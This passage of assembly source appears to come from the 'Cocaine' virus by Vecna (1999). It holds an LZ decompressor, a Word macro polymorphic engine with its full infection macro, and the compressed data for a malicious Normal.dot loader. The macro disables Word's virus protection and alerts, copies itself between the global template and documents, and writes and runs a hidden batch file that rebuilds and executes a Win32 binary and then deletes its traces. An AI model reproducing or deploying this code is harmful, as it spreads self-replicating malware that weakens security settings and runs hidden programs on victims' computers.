; *p_dst_len=src_len-FLAG_BYTES; return;}
|
|||
|
;
|
|||
|
?live1@912: ; EDI = @temp14
|
|||
|
mov eax,dword ptr [ebp+8]
|
|||
|
mov dword ptr [eax],edi
|
|||
|
jmp short @29
|
|||
|
;
|
|||
|
; while (p_src!=p_src_post)
|
|||
|
;
|
|||
|
?live1@928: ; EAX = p_src, EDX = p_dst, EDI = control, ESI = controlbits
|
|||
|
@28:
|
|||
|
cmp eax,dword ptr [ebp-4]
|
|||
|
je short @31
|
|||
|
;
|
|||
|
; {if (controlbits==0)
|
|||
|
;
|
|||
|
@30:
|
|||
|
test esi,esi
|
|||
|
jne short @32
|
|||
|
;
|
|||
|
; {control=*p_src++; control|=(*p_src++)<<8; controlbits=16;}
|
|||
|
;
|
|||
|
?live1@960: ; EAX = p_src, EDX = p_dst
|
|||
|
movzx edi,byte ptr [eax]
|
|||
|
inc eax
|
|||
|
xor ecx,ecx
|
|||
|
; mov esi,16
|
|||
|
push 16
|
|||
|
pop esi
|
|||
|
mov cl,byte ptr [eax]
|
|||
|
shl ecx,8
|
|||
|
or edi,ecx
|
|||
|
inc eax
|
|||
|
;
|
|||
|
; if (control&1)
|
|||
|
;
|
|||
|
?live1@976: ; EAX = p_src, EDX = p_dst, EDI = control, ESI = controlbits
|
|||
|
@32:
|
|||
|
test edi,1
|
|||
|
je short @33
|
|||
|
|
|||
|
; jnc short @33
|
|||
|
;
|
|||
|
; {UWORD offset,len; UBYTE *p;
|
|||
|
; offset=(*p_src&0xF0)<<4; len=1+(*p_src++&0xF);
|
|||
|
;
|
|||
|
@34:
|
|||
|
xor ebx,ebx
|
|||
|
xor ecx,ecx
|
|||
|
mov bl,byte ptr [eax]
|
|||
|
mov cl,byte ptr [eax]
|
|||
|
and ebx,15
|
|||
|
inc eax
|
|||
|
inc ebx
|
|||
|
and ecx,240
|
|||
|
mov dword ptr [ebp-8],ebx
|
|||
|
;
|
|||
|
; offset+=*p_src++&0xFF; p=p_dst-offset;
|
|||
|
;
|
|||
|
?live1@1008: ; EAX = p_src, EDX = p_dst, EDI = control, ESI = controlbits, ECX = offset
|
|||
|
;
|
|||
|
xor ebx,ebx
|
|||
|
mov bl,byte ptr [eax]
|
|||
|
inc eax
|
|||
|
?live1@1024: ; EAX = p_src, EDX = p_dst, EDI = control, ESI = controlbits
|
|||
|
shl ecx,4
|
|||
|
?live1@1040: ; EAX = p_src, EDX = p_dst, EDI = control, ESI = controlbits, ECX = offset
|
|||
|
;
|
|||
|
and ebx,255
|
|||
|
add ecx,ebx
|
|||
|
mov ebx,edx
|
|||
|
sub ebx,ecx
|
|||
|
mov ecx,ebx
|
|||
|
jmp short @36
|
|||
|
;
|
|||
|
; while (len--) *p_dst++=*p++;}
|
|||
|
;
|
|||
|
?live1@1056: ; EAX = p_src, EDX = p_dst, ECX = p, EDI = control, ESI = controlbits
|
|||
|
;
|
|||
|
@35:
|
|||
|
mov bl,byte ptr [ecx]
|
|||
|
inc ecx
|
|||
|
mov byte ptr [edx],bl
|
|||
|
inc edx
|
|||
|
@36:
|
|||
|
mov ebx,dword ptr [ebp-8]
|
|||
|
add dword ptr [ebp-8],-1
|
|||
|
test ebx,ebx
|
|||
|
jne short @35
|
|||
|
@37:
|
|||
|
jmp short @38
|
|||
|
;
|
|||
|
; else
|
|||
|
; *p_dst++=*p_src++;
|
|||
|
;
|
|||
|
?live1@1072: ; EAX = p_src, EDX = p_dst, EDI = control, ESI = controlbits
|
|||
|
@33:
|
|||
|
mov cl,byte ptr [eax]
|
|||
|
inc eax
|
|||
|
mov byte ptr [edx],cl
|
|||
|
inc edx
|
|||
|
;
|
|||
|
; control>>=1; controlbits--;
|
|||
|
;
|
|||
|
@38:
|
|||
|
shr edi,1
|
|||
|
dec esi
|
|||
|
cmp eax,dword ptr [ebp-4]
|
|||
|
jne short @30
|
|||
|
;
|
|||
|
; }
|
|||
|
; *p_dst_len=p_dst-p_dst_first;
|
|||
|
;
|
|||
|
?live1@1120: ; EDX = p_dst
|
|||
|
@31:
|
|||
|
sub edx,dword ptr [ebp+12]
|
|||
|
mov eax,dword ptr [ebp+8]
|
|||
|
mov dword ptr [eax],edx
|
|||
|
;
|
|||
|
; }
|
|||
|
;
|
|||
|
?live1@1136: ;
|
|||
|
@39:
|
|||
|
@29:
|
|||
|
pop edi
|
|||
|
pop esi
|
|||
|
pop ebx
|
|||
|
pop ecx
|
|||
|
pop ecx
|
|||
|
pop ebp
|
|||
|
ret 16
|
|||
|
lzrw1_decompress endp
|
|||
|
|
|||
|
;-----------------------------------(LZ.INC)----------------------------------
|
|||
|
;---------------------------------(MACRO.INC)---------------------------------
|
|||
|
;Macro poly data
|
|||
|
;(c) Vecna 1999
|
|||
|
;ASM->COM->LZ->INC
|
|||
|
|
|||
|
;The code in COMMENT bellow is to be compiled to a .COM file, then compressed
|
|||
|
;with my LZ compressor, then BIN2INCed. It is the code used for macro poly
|
|||
|
;engine and do the actual infection process. The macro code is divided in
|
|||
|
;chunks. The format of each chunks is simple: the first byte indicate the
|
|||
|
;step that this chunk will be processed, and follow a ASCIIZ string. The macro
|
|||
|
;poly engine copies each chunk, mixing the ones from the same level between
|
|||
|
;themselfs, and inserting macro garbage code between real macro lines. Some
|
|||
|
;chunks(6) receive special processing by the engine ;-)
|
|||
|
;The macro poly engine also do magic with the %X labels: they're changed by
|
|||
|
;random strings.
|
|||
|
|
|||
|
; '%1
|
|||
|
; SUB AUTOCLOSE()
|
|||
|
; ON ERROR RESUME NEXT
|
|||
|
;OPTIONS.VIRUSPROTECTION = FALSE
|
|||
|
; OPTIONS.CONFIRMCONVERSIONS = FALSE
|
|||
|
; OPTIONS.SAVENORMALPROMPT = FALSE
|
|||
|
; APPLICATION.DISPLAYALERTS = WDALERTSNONE
|
|||
|
; SHOWVISUALBASICEDITOR = FALSE
|
|||
|
; %2=1
|
|||
|
; %3=1
|
|||
|
; FOR %4 = 1 TO NORMALTEMPLATE.VBPROJECT.VBCOMPONENTS.COUNT
|
|||
|
; IF NORMALTEMPLATE.VBPROJECT.VBCOMPONENTS(%4).CODEMODULE.LINES(1,1) = "'%1" THEN %2=%4
|
|||
|
; NEXT %4
|
|||
|
; FOR %4 = 1 TO ACTIVEDOCUMENT.VBPROJECT.VBCOMPONENTS.COUNT
|
|||
|
; IF ACTIVEDOCUMENT.VBPROJECT.VBCOMPONENTS(%4).CODEMODULE.LINES(1,1) = "'%1" THEN %3=%4
|
|||
|
; NEXT %4
|
|||
|
; OPEN "C:\%7.BAT" FOR OUTPUT AS 1
|
|||
|
; PRINT #1,"@ECHO OFF"
|
|||
|
; PRINT #1,"DEBUG <C:\COCAINE.SRC >NUL"
|
|||
|
; PRINT #1,"COPY C:\W32COKE.EX C:\W32COKE.EXE >NUL"
|
|||
|
; PRINT #1,"C:\W32COKE.EXE"
|
|||
|
; PRINT #1,"DEL C:\W32COKE.EX >NUL"
|
|||
|
; PRINT #1,"DEL C:\COCAINE.SRC >NUL"
|
|||
|
; PRINT #1,"DEL C:\COCAINE.SYS >NUL"
|
|||
|
; PRINT #1,"DEL C:\W32COKE.EXE >NUL"
|
|||
|
; PRINT #1,"DEL C:\%7.BAT >NUL"
|
|||
|
; CLOSE #1
|
|||
|
; SET %5 = NORMALTEMPLATE.VBPROJECT.VBCOMPONENTS(%2).CODEMODULE
|
|||
|
; SET %6 = ACTIVEDOCUMENT.VBPROJECT.VBCOMPONENTS(%3).CODEMODULE
|
|||
|
; IF %5.LINES(1, 1) <> "'%1" THEN
|
|||
|
; %5.DELETELINES 1, %5.COUNTOFLINES
|
|||
|
; %5.INSERTLINES 1, %6.LINES(1, %6.COUNTOFLINES)
|
|||
|
; END IF
|
|||
|
; IF %6.LINES(1, 1) <> "'%1" THEN
|
|||
|
; %6.DELETELINES 1, %6.COUNTOFLINES
|
|||
|
; %6.INSERTLINES 1, %5.LINES(1, %5.COUNTOFLINES)
|
|||
|
; END IF
|
|||
|
; OPEN "C:\ANCEV.SYS" FOR OUTPUT AS 1
|
|||
|
; CLOSE 1
|
|||
|
; SHELL %7.BAT, VBHIDE
|
|||
|
; FOR %4 = 1 TO 100
|
|||
|
; NEXT %4
|
|||
|
; KILL %7.BAT
|
|||
|
; END SUB
|
|||
|
;
|
|||
|
; The following code should be compiled to a .COM file:
|
|||
|
;
|
|||
|
; .MODEL TINY
|
|||
|
; .CODE
|
|||
|
; .STARTUP
|
|||
|
;
|
|||
|
; CRLF EQU <13,10>
|
|||
|
;
|
|||
|
; DB 1
|
|||
|
; DB "'%1", CRLF
|
|||
|
; DB "SUB AUTOCLOSE()", CRLF
|
|||
|
; DB "ON ERROR RESUME NEXT", CRLF
|
|||
|
; DB 0
|
|||
|
;
|
|||
|
; DB 2
|
|||
|
; DB "OPTIONS.VIRUSPROTECTION = FALSE", CRLF
|
|||
|
; DB 0
|
|||
|
;
|
|||
|
; DB 2
|
|||
|
; DB "OPTIONS.CONFIRMCONVERSIONS = FALSE", CRLF
|
|||
|
; DB 0
|
|||
|
;
|
|||
|
; DB 2
|
|||
|
; DB "OPTIONS.SAVENORMALPROMPT = FALSE", CRLF
|
|||
|
; DB 0
|
|||
|
;
|
|||
|
; DB 2
|
|||
|
; DB "APPLICATION.DISPLAYALERTS = WDALERTSNONE", CRLF
|
|||
|
; DB 0
|
|||
|
;
|
|||
|
; DB 2
|
|||
|
; DB "SHOWVISUALBASICEDITOR = FALSE", CRLF
|
|||
|
; DB 0
|
|||
|
;
|
|||
|
; DB 2
|
|||
|
; DB "%2=1", CRLF
|
|||
|
; DB 0
|
|||
|
;
|
|||
|
; DB 2
|
|||
|
; DB "%3=1", CRLF
|
|||
|
; DB 0
|
|||
|
;
|
|||
|
; DB 3
|
|||
|
; DB "FOR %4 = 1 TO NORMALTEMPLATE.VBPROJECT.VBCOMPONENTS.COUNT", CRLF
|
|||
|
; DB 'IF NORMALTEMPLATE.VBPROJECT.VBCOMPONENTS(%4).CODEMODULE.LINES(1,1) = "''%1" THEN %2=%4', CRLF
|
|||
|
; DB "NEXT %4", CRLF
|
|||
|
; DB 0
|
|||
|
;
|
|||
|
; DB 3
|
|||
|
; DB "FOR %4 = 1 TO ACTIVEDOCUMENT.VBPROJECT.VBCOMPONENTS.COUNT", CRLF
|
|||
|
; DB 'IF ACTIVEDOCUMENT.VBPROJECT.VBCOMPONENTS(%4).CODEMODULE.LINES(1,1) = "''%1" THEN %3=%4', CRLF
|
|||
|
; DB "NEXT %4", CRLF
|
|||
|
; DB 0
|
|||
|
;
|
|||
|
; DB 3
|
|||
|
; DB 'OPEN "C:\%7.BAT" FOR OUTPUT AS 1', CRLF
|
|||
|
; DB 'PRINT #1,"@ECHO OFF"', CRLF
|
|||
|
; DB 'PRINT #1,"DEBUG <C:\COCAINE.SRC >NUL"', CRLF
|
|||
|
; DB 'PRINT #1,"COPY C:\W32COKE.EX C:\W32COKE.EXE >NUL"', CRLF
|
|||
|
; DB 'PRINT #1,"C:\W32COKE.EXE"', CRLF
|
|||
|
; DB 'PRINT #1,"DEL C:\W32COKE.EX >NUL"', CRLF
|
|||
|
; DB 'PRINT #1,"DEL C:\COCAINE.SRC >NUL"', CRLF
|
|||
|
; DB 'PRINT #1,"DEL C:\COCAINE.SYS >NUL"', CRLF
|
|||
|
; DB 'PRINT #1,"DEL C:\W32COKE.EXE >NUL"', CRLF
|
|||
|
; DB 'PRINT #1,"DEL C:\%7.BAT >NUL"', CRLF
|
|||
|
; DB 'CLOSE #1', CRLF
|
|||
|
; DB 0
|
|||
|
;
|
|||
|
; DB 4
|
|||
|
; DB "SET %5 = NORMALTEMPLATE.VBPROJECT.VBCOMPONENTS(%2).CODEMODULE", CRLF
|
|||
|
; DB 0
|
|||
|
;
|
|||
|
; DB 4
|
|||
|
; DB "SET %6 = ACTIVEDOCUMENT.VBPROJECT.VBCOMPONENTS(%3).CODEMODULE", CRLF
|
|||
|
; DB 0
|
|||
|
;
|
|||
|
; DB 5
|
|||
|
; DB 'IF %5.LINES(1, 1) <> "''%1" THEN', CRLF
|
|||
|
; DB "%5.DELETELINES 1, %5.COUNTOFLINES", CRLF
|
|||
|
; DB "%5.INSERTLINES 1, %6.LINES(1, %6.COUNTOFLINES)", CRLF
|
|||
|
; DB "END IF", CRLF
|
|||
|
; DB 0
|
|||
|
;
|
|||
|
; DB 5
|
|||
|
; DB 'IF %6.LINES(1, 1) <> "''%1" THEN', CRLF
|
|||
|
; DB "%6.DELETELINES 1, %6.COUNTOFLINES", CRLF
|
|||
|
; DB "%6.INSERTLINES 1, %5.LINES(1, %5.COUNTOFLINES)", CRLF
|
|||
|
; DB "END IF", CRLF
|
|||
|
; DB 0
|
|||
|
;
|
|||
|
; DB 6
|
|||
|
;;CREATE DEBUG SCRIPT
|
|||
|
; DB 0
|
|||
|
;
|
|||
|
; DB 7
|
|||
|
; DB 'OPEN "C:\ANCEV.SYS" FOR OUTPUT AS 1', CRLF
|
|||
|
; DB 'PRINT #1,""', CRLF
|
|||
|
; DB "CLOSE #1", CRLF
|
|||
|
; DB 0
|
|||
|
;
|
|||
|
; DB 7
|
|||
|
; DB "SHELL %7.BAT, VBHIDE", CRLF
|
|||
|
; DB "FOR %4=1 TO 100", CRLF
|
|||
|
; DB "NEXT %4", CRLF
|
|||
|
; DB "KILL %7.BAT", CRLF
|
|||
|
; DB 0
|
|||
|
;
|
|||
|
; DB 8
|
|||
|
; DB "END SUB", CRLF
|
|||
|
; DB 0
|
|||
|
;
|
|||
|
; END
|
|||
|
|
|||
|
macro_sized dd 0
|
|||
|
macro_size EQU 750 ; size in bytes
|
|||
|
macros DB 000H,000H,000H,000H,000H,000H,001H,027H,025H,031H,00DH,00AH,053H,055H
|
|||
|
DB 042H,020H,041H,055H,054H,04FH,043H,04CH,000H,000H,04FH,053H,045H,028H,029H
|
|||
|
DB 00DH,00AH,04FH,04EH,020H,045H,052H,052H,04FH,052H,020H,000H,000H,052H,045H
|
|||
|
DB 053H,055H,04DH,045H,020H,04EH,045H,058H,054H,00DH,00AH,000H,002H,04FH,000H
|
|||
|
DB 000H,050H,054H,049H,04FH,04EH,053H,02EH,056H,049H,052H,055H,053H,050H,052H
|
|||
|
DB 04FH,054H,004H,008H,045H,043H,003H,011H,020H,03DH,020H,046H,041H,04CH,053H
|
|||
|
DB 045H,00BH,023H,043H,04FH,04EH,046H,008H,007H,049H,052H,04DH,002H,007H,056H
|
|||
|
DB 045H,052H,053H,003H,036H,00FH,026H,003H,049H,053H,041H,056H,045H,04EH,020H
|
|||
|
DB 002H,04FH,052H,04DH,041H,04CH,002H,04EH,04DH,050H,054H,00BH,024H,041H,050H
|
|||
|
DB 050H,04CH,049H,043H,002H,000H,041H,003H,061H,02EH,044H,049H,053H,050H,04CH
|
|||
|
DB 041H,059H,041H,04CH,045H,052H,054H,053H,089H,000H,002H,025H,057H,044H,005H
|
|||
|
DB 00BH,04EH,04FH,04EH,004H,076H,053H,048H,04FH,057H,056H,049H,053H,055H,000H
|
|||
|
DB 018H,041H,04CH,042H,041H,053H,049H,043H,045H,044H,049H,054H,002H,0BEH,00AH
|
|||
|
DB 097H,025H,032H,03DH,021H,009H,002H,0E9H,000H,002H,025H,033H,004H,008H,003H
|
|||
|
DB 046H,002H,01FH,025H,034H,002H,04AH,031H,020H,054H,04FH,022H,068H,020H,005H
|
|||
|
DB 083H,054H,045H,04DH,002H,065H,054H,045H,02EH,056H,042H,002H,08EH,04AH,002H
|
|||
|
DB 0DCH,002H,00AH,043H,008H,090H,04FH,04DH,050H,002H,065H,04EH,054H,053H,02EH
|
|||
|
DB 043H,04FH,055H,04EH,012H,007H,049H,046H,00FH,030H,043H,000H,00FH,030H,005H
|
|||
|
DB 030H,028H,025H,034H,029H,002H,034H,044H,045H,04DH,04FH,044H,055H,04CH,045H
|
|||
|
DB 02EH,000H,014H,04CH,049H,04EH,045H,053H,028H,031H,02CH,031H,029H,002H,077H
|
|||
|
DB 022H,012H,079H,022H,020H,054H,010H,0AAH,048H,045H,04EH,020H,002H,09BH,025H
|
|||
|
DB 034H,00DH,00AH,013H,064H,020H,003H,009H,000H,00EH,09DH,041H,012H,064H,020H
|
|||
|
DB 0BBH,056H,045H,044H,04FH,043H,012H,08AH,04EH,054H,002H,093H,00FH,09DH,045H
|
|||
|
DB 00DH,09DH,00FH,030H,00FH,0CDH,04EH,003H,030H,0CBH,004H,00FH,09DH,00FH,09DH
|
|||
|
DB 031H,007H,09DH,033H,03DH,003H,094H,00AH,09DH,04FH,050H,002H,0B4H,022H,043H
|
|||
|
DB 03AH,05CH,025H,080H,000H,037H,02EH,042H,041H,054H,022H,020H,013H,04BH,04FH
|
|||
|
DB 055H,054H,050H,055H,054H,020H,041H,004H,000H,053H,020H,012H,066H,050H,052H
|
|||
|
DB 049H,04EH,054H,020H,023H,031H,02CH,022H,040H,045H,043H,000H,002H,048H,04FH
|
|||
|
DB 020H,04FH,046H,046H,022H,00DH,00AH,009H,016H,044H,045H,042H,055H,047H,020H
|
|||
|
DB 042H,000H,03CH,002H,043H,043H,04FH,043H,041H,012H,016H,02EH,053H,052H,043H
|
|||
|
DB 020H,03EH,04EH,055H,04CH,041H,000H,00CH,027H,043H,04FH,050H,059H,020H,002H
|
|||
|
DB 025H,057H,033H,032H,043H,04FH,04BH,045H,02EH,045H,06AH,031H,058H,00DH,00EH
|
|||
|
DB 045H,00FH,033H,02CH,003H,096H,009H,02EH,045H,00CH,04EH,044H,045H,04CH,00DH
|
|||
|
DB 03FH,00FH,03EH,02CH,022H,09FH,0FFH,006H,023H,00FH,095H,00FH,047H,003H,047H
|
|||
|
DB 008H,024H,059H,053H,00FH,048H,008H,048H,00AH,08AH,00FH,024H,008H,024H,015H
|
|||
|
DB 044H,007H,01FH,034H,080H,012H,039H,001H,06FH,032H,048H,004H,053H,045H,054H
|
|||
|
DB 020H,025H,035H,022H,02AH,02FH,09CH,01FH,0CFH,016H,0CFH,032H,02BH,06CH,008H
|
|||
|
DB 041H,036H,0AFH,014H,002H,041H,02FH,010H,00FH,041H,006H,041H,033H,00EH,041H
|
|||
|
DB 005H,022H,0E8H,025H,035H,028H,0B6H,020H,022H,0B7H,03CH,03EH,020H,019H,071H
|
|||
|
DB 029H,0B8H,00DH,00AH,002H,01EH,012H,033H,045H,054H,045H,024H,03DH,020H,031H
|
|||
|
DB 02CH,002H,0B1H,022H,0F1H,032H,025H,04FH,0C6H,065H,046H,004H,013H,004H,023H
|
|||
|
DB 049H,04EH,053H,032H,0B5H,004H,010H,004H,023H,036H,009H,053H,025H,036H,00CH
|
|||
|
DB 02FH,042H,079H,045H,0E0H,0F3H,04EH,044H,020H,049H,046H,002H,0BFH,004H,07EH
|
|||
|
DB 00AH,02BH,00FH,07EH,002H,05BH,036H,02EH,00FH,07EH,00DH,04FH,004H,023H,00FH
|
|||
|
DB 07EH,033H,002H,00AH,0D1H,002H,0BFH,043H,04FH,009H,0ADH,00BH,07EH,006H,000H
|
|||
|
DB 007H,028H,0E7H,041H,04EH,043H,045H,056H,02EH,078H,040H,053H,059H,053H,02FH
|
|||
|
DB 0EAH,02CH,0EAH,022H,025H,01AH,0BEH,007H,053H,048H,045H,04CH,04CH,020H,015H
|
|||
|
DB 0DEH,02CH,0C0H,088H,020H,056H,042H,048H,049H,044H,042H,0A8H,033H,02AH,025H
|
|||
|
DB 034H,03DH,044H,073H,031H,030H,030H,03AH,0F4H,004H,000H,04BH,049H,008H,02FH
|
|||
|
DB 00DH,00AH,000H,008H,045H,04EH,044H,020H,053H,055H,042H,00DH,00AH,000H,000H
|
|||
|
DB 000H
|
|||
|
;---------------------------------(MACRO.INC)---------------------------------
|
|||
|
;----------------------------------(NDOT.INC)---------------------------------
|
|||
|
;Macro poly data
|
|||
|
;(c) Vecna 1999
|
|||
|
|
|||
|
;This is the binary image of the LZ compressed NORMAL.DOT loader. The loader
|
|||
|
;is, basically, a WinWord8 template with the code below. Its function is load
|
|||
|
;the 2nd part of the macro virus code, polymorphic, from the disk. The routine
|
|||
|
;that drop the image should be changed to make it _patch_ the ' COCAINE string
|
|||
|
;and making the virus stop reinfecting, copying the first line of the virus
|
|||
|
;dropped source to there... bahh, nevermind... :-)
|
|||
|
|
|||
|
;Sub AutoExec()
|
|||
|
;On Error Goto erro
|
|||
|
;Application.DisplayAlerts = False
|
|||
|
;Application.EnableCancelKey = wdDisabled
|
|||
|
;For i = 1 To NormalTemplate.VBProject.VBComponents.Count
|
|||
|
;If NormalTemplate.VBProject.VBComponents(i).CodeModule.Lines(1,1) = "'Cocaine" Then GoTo erro
|
|||
|
;Next i
|
|||
|
;NormalTemplate.VBProject.VBComponents.Import("c:\cocaine.sys")
|
|||
|
;NormalTemplate.Save
|
|||
|
;erro:
|
|||
|
;End Sub
|
|||
|
|
|||
|
normaldot_size EQU 8292 ; size in bytes
|
|||
|
|
|||
|
normaldot_sized dd 0
|
|||
|
normaldot DB 000H,000H,000H,000H,000H,002H,0D0H,0CFH,011H,0E0H,0A1H,0B1H,01AH,0E1H
|
|||
|
DB 000H,00EH,001H,03EH,000H,003H,000H,0FEH,0FFH,0A8H,061H,009H,000H,006H,00AH
|
|||
|
DB 018H,001H,002H,00CH,021H,002H,004H,004H,003H,010H,000H,000H,023H,002H,009H
|
|||
|
DB 003H,014H,0FEH,0C8H,0FFH,0FFH,0FFH,0FFH,002H,00BH,000H,020H,002H,005H,002H
|
|||
|
DB 00BH,00FH,003H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
|
|||
|
DB 00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
|
|||
|
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
|
|||
|
DB 00FH,010H,00FH,010H,00FH,010H,007H,000H,00FH,010H,00FH,010H,00CH,010H,0ECH
|
|||
|
DB 0A5H,0C1H,000H,049H,000H,016H,004H,000H,000H,001H,012H,0BFH,03FH,000H,012H
|
|||
|
DB 0C0H,002H,003H,012H,0DAH,002H,006H,003H,012H,002H,004H,00EH,000H,062H,06AH
|
|||
|
DB 062H,06AH,0B2H,0B3H,0B2H,0B3H,003H,0E0H,002H,014H,00EH,003H,016H,004H,016H
|
|||
|
DB 000H,01EH,00CH,000H,000H,0D0H,0D9H,001H,004H,004H,023H,00CH,00EH,023H,0F1H
|
|||
|
DB 0CAH,00CH,00FH,0FFH,0FFH,00FH,008H,010H,00FH,00CH,008H,019H,006H,009H,05DH
|
|||
|
DB 004H,008H,08CH,004H,006H,000H,000H,003H,008H,003H,004H,0B7H,067H,003H,00FH
|
|||
|
DB 00FH,008H,00BH,010H,014H,003H,021H,006H,004H,0BCH,00FH,008H,00FH,010H,002H
|
|||
|
DB 010H,002H,0BDH,000H,0C8H,006H,008H,007H,030H,018H,0D0H,0AFH,002H,000H,000H
|
|||
|
DB 0B6H,002H,014H,0E0H,002H,004H,003H,003H,00FH,008H,00FH,010H,00FH,010H,007H
|
|||
|
DB 010H,018H,012H,00FH,0C7H,002H,041H,076H,055H,0DFH,002H,008H,002H,007H,000H
|
|||
|
DB 00FH,008H,00FH,010H,003H,010H,024H,002H,029H,0CEH,002H,080H,0F4H,002H,034H
|
|||
|
DB 0C2H,012H,07EH,03EH,0F5H,0FFH,002H,010H,003H,002H,010H,015H,002H,008H,00FH
|
|||
|
DB 003H,007H,0F8H,007H,070H,00FH,020H,007H,018H,00FH,008H,007H,010H,003H,058H
|
|||
|
DB 003H,034H,007H,010H,007H,050H,0FFH,05FH,007H,008H,007H,018H,003H,024H,003H
|
|||
|
DB 004H,007H,010H,00FH,008H,00FH,010H,007H,010H,00FH,048H,00FH,010H,013H,020H
|
|||
|
DB 003H,058H,00FH,004H,0A0H,002H,011H,00EH,0FDH,0FBH,002H,004H,0AEH,002H,004H
|
|||
|
DB 003H,008H,007H,038H,00FH,008H,007H,010H,007H,070H,007H,050H,003H,010H,038H
|
|||
|
DB 002H,03CH,003H,008H,002H,007H,008H,003H,007H,020H,0FFH,006H,007H,038H,007H
|
|||
|
DB 008H,008H,021H,00FH,009H,00FH,010H,00EH,010H,007H,050H,007H,068H,0D4H,002H
|
|||
|
DB 020H,023H,050H,0A0H,010H,0DAH,09BH,0B8H,0F8H,0FFH,065H,0BEH,001H,027H,050H
|
|||
|
DB 007H,008H,007H,028H,007H,038H,002H,02FH,00FH,003H,00FH,010H,00FH,010H,00FH
|
|||
|
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FDH,0FFH,002H,010H,00DH,002H
|
|||
|
DB 004H,00FH,003H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
|
|||
|
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH
|
|||
|
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
|
|||
|
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
|
|||
|
DB 010H,0EFH,0FFH,00FH,010H,00FH,010H,00CH,010H,042H,066H,001H,002H,004H,00CH
|
|||
|
DB 014H,00FH,00DH,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
|
|||
|
DB 00FH,010H,00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
|
|||
|
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
|
|||
|
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,03FH,0FBH,00FH,010H,00FH,010H,00FH
|
|||
|
DB 010H,00FH,010H,00FH,010H,009H,010H,001H,000H,012H,0FCH,023H,000H,0FDH,009H
|
|||
|
DB 014H,00FH,00AH,00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H
|
|||
|
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
|
|||
|
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FFH,0EFH
|
|||
|
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
|
|||
|
DB 010H,00FH,010H,00FH,010H,007H,010H,082H,064H,000H,028H,000H,007H,015H,00FH
|
|||
|
DB 008H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
|
|||
|
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
|
|||
|
DB 010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H
|
|||
|
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
|
|||
|
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H
|
|||
|
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
|
|||
|
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH
|
|||
|
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
|
|||
|
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
|
|||
|
DB 00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
|
|||
|
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
|
|||
|
DB 00FH,010H,00FH,010H,00FH,010H,0FFH,03FH,00FH,010H,00FH,010H,00FH,010H,00FH
|
|||
|
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
|
|||
|
DB 00FH,010H,00FH,010H,00FH,010H,012H,000H,0E8H,041H,00FH,000H,00AH,062H,007H
|
|||
|
DB 05BH,002H,008H,0E2H,069H,004H,01FH,0E2H,086H,040H,0F1H,0FFH,002H,000H,002H
|
|||
|
DB 008H,000H,000H,060H,006H,000H,04EH,000H,06FH,000H,072H,000H,06DH,000H,061H
|
|||
|
DB 000H,06CH,002H,01EH,003H,024H,004H,070H,000H,000H,06DH,048H,016H,082H,038H
|
|||
|
DB 002H,00FH,00CH,003H,036H,000H,041H,040H,0F2H,0FFH,0A1H,000H,036H,011H,040H
|
|||
|
DB 002H,016H,013H,000H,046H,002H,038H,06EH,000H,074H,000H,065H,000H,020H,000H
|
|||
|
DB 070H,002H,03EH,072H,040H,03DH,000H,0E1H,000H,067H,000H,02EH,006H,00EH,064H
|
|||
|
DB 002H,054H,0E3H,002H,022H,002H,02BH,00CH,003H,063H,095H,002H,000H,062H,078H
|
|||
|
DB 000H,0D2H,049H,001H,000H,0FFH,002H,001H,003H,010H,004H,020H,0FFH,0FFH,003H
|
|||
|
DB 008H,005H,029H,009H,00AH,087H,0BCH,003H,0AFH,082H,003H,019H,002H,090H,083H
|
|||
|
DB 0C8H,002H,007H,000H,007H,018H,005H,002H,018H,0FFH,002H,0C8H,000H,000H,005H
|
|||
|
DB 000H,056H,002H,088H,008H,000H,063H,000H,06EH,002H,088H,012H,000H,043H,000H
|
|||
|
DB 03AH,000H,05CH,000H,04CH,000H,049H,000H,028H,02AH,058H,000H,04FH,002H,00AH
|
|||
|
